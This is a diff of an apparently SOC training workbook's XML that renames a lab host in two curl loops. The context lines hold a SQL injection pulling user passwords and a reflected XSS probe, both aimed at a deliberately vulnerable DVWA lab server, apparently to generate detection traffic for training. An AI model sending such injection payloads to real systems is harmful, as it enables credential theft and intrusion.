--- a/contents/battle-workbook/soc-adv-w02.docx
+++ b/contents/battle-workbook/soc-adv-w02.docx
@@ -536,7 +536,7 @@
         </w:rPr>
         <w:t>for i in $(seq 1 8); do</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  curl -s -A "sqlmap/1.7" -H "Host: dvwa.6v6.lab" \</w:t>
+        <w:t xml:space="preserve">  curl -s -A "sqlmap/1.7" -H "Host: dvwa.el34.lab" \</w:t>
         <w:br/>
         <w:t xml:space="preserve">    "http://192.168.0.161/vulnerabilities/sqli/?id=sa02r1-kim-$i%27%20UNION%20SELECT%20user,password%20FROM%20users--+&amp;Submit=Submit"</w:t>
         <w:br/>
@@ -902,7 +902,7 @@
         </w:rPr>
         <w:t>for i in $(seq 1 5); do</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  curl -s -H "Host: dvwa.6v6.lab" \</w:t>
+        <w:t xml:space="preserve">  curl -s -H "Host: dvwa.el34.lab" \</w:t>
         <w:br/>
         <w:t xml:space="preserve">    "http://192.168.0.161/vulnerabilities/xss_r/?name=sa02r2-kim-$i&lt;script&gt;alert(1)&lt;/script&gt;"</w:t>
         <w:br/>
